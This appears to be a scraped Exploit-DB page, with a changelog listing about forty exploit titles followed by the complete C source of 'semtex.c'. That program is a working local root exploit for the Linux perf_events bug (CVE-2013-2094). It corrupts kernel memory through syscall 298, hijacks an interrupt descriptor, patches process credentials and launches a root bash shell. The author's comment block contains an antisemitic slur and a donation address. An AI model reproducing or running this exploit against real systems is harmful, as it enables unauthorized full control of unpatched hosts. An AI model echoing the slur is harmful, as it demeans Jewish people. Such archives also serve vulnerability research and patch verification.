813a3efbb5
20 changes to exploits/shellcodes Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow Jnes 1.0.2 - Stack Buffer Overflow Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow netek 0.8.2 - Denial of Service Cisco Smart Install - Crash (PoC) Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1) Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) Adobe Reader PDF - Client Side Request Injection Windows - Local Privilege Escalation Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit) Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit) Adobe Flash < 28.0.0.161 - Use-After-Free Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC) GPON Routers - Authentication Bypass / Command Injection TBK DVR4104 / DVR4216 - Credentials Leak Call of Duty Modern Warefare 2 - Buffer Overflow Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion Squirrelcart 1.x - 'cart.php' Remote File Inclusion Infinity 2.x.x - options[style_dir] Local File Disclosure Infinity 2.x - 'options[style_dir]' Local File Disclosure PHP-Nuke 8.x.x - Blind SQL Injection PHP-Nuke 8.x - Blind SQL Injection WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x - 'clientarea.php' Local File Disclosure Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities Ajax Availability Calendar 3.x - Multiple Vulnerabilities vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection vBulletin vBSEO 4.x - 'visitormessage.php' Remote Code Injection WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting Subrion 3.X.x - Multiple Vulnerabilities Subrion 3.x - Multiple Vulnerabilities Ciuis CRM 1.0.7 - SQL Injection LifeSize ClearSea 3.1.4 - Directory Traversal WordPress Plugin Activity Log 2.4.0 - Cross-Site Scripting DLINK DCS-5020L - Remote Code Execution (PoC) Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
91 lines
No EOL
2.8 KiB
C
91 lines
No EOL
2.8 KiB
C
/*
|
|
* linux 2.6.37-3.x.x x86_64, ~100 LOC
|
|
* gcc-4.6 -O2 semtex.c && ./a.out
|
|
* 2010 sd@fucksheep.org, salut!
|
|
*
|
|
* update may 2013:
|
|
* seems like centos 2.6.32 backported the perf bug, lol.
|
|
* jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
|
|
*
|
|
* EDB Note: Update ~ http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
|
|
* ~ https://github.com/realtalk/cve-2013-2094/blob/master/rewritten_semtex.c
|
|
*/
|
|
|
|
#define _GNU_SOURCE 1
|
|
#include <stdint.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <sys/mman.h>
|
|
#include <syscall.h>
|
|
#include <stdint.h>
|
|
#include <assert.h>
|
|
|
|
#define BASE 0x380000000
|
|
#define SIZE 0x010000000
|
|
#define KSIZE 0x2000000
|
|
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
|
|
|
|
void fuck() {
|
|
int i,j,k;
|
|
uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
|
|
uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
|
|
uint64_t kbase = ((uint64_t)current)>>36;
|
|
uint32_t *fixptr = (void*) AB(1);
|
|
*fixptr = -1;
|
|
|
|
for (i=0; i<4000; i+=4) {
|
|
uint64_t *p = (void *)¤t[i];
|
|
uint32_t *t = (void*) p[0];
|
|
if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
|
|
for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
|
|
if (((uint32_t*)uids)[k] != t[j+k]) goto next;
|
|
for (i = 0; i < 8; i++) t[j+i] = 0;
|
|
for (i = 0; i < 10; i++) t[j+9+i] = -1;
|
|
return;
|
|
next:; }
|
|
}
|
|
}
|
|
|
|
void sheep(uint32_t off) {
|
|
uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
|
|
int fd = syscall(298, buf, 0, -1, -1, 0);
|
|
assert(!close(fd));
|
|
}
|
|
|
|
|
|
int main() {
|
|
uint64_t u,g,needle, kbase, *p; uint8_t *code;
|
|
uint32_t *map, j = 5;
|
|
int i;
|
|
struct {
|
|
uint16_t limit;
|
|
uint64_t addr;
|
|
} __attribute__((packed)) idt;
|
|
assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
|
|
memset(map, 0, SIZE);
|
|
sheep(-1); sheep(-2);
|
|
for (i = 0; i < SIZE/4; i++) if (map[i]) {
|
|
assert(map[i+1]);
|
|
break;
|
|
}
|
|
assert(i<SIZE/4);
|
|
asm ("sidt %0" : "=m" (idt));
|
|
kbase = idt.addr & 0xff000000;
|
|
u = getuid(); g = getgid();
|
|
assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
|
|
memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
|
|
memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
|
|
printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
|
|
setresuid(u,u,u); setresgid(g,g,g);
|
|
while (j--) {
|
|
needle = AB(j+1);
|
|
assert(p = memmem(code, 1024, &needle, 8));
|
|
if (!p) continue;
|
|
*p = j?((g<<32)|u):(idt.addr + 0x48);
|
|
}
|
|
sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
|
|
asm("int $0x4"); assert(!setuid(0));
|
|
return execl("/bin/bash", "-sh", NULL);
|
|
} |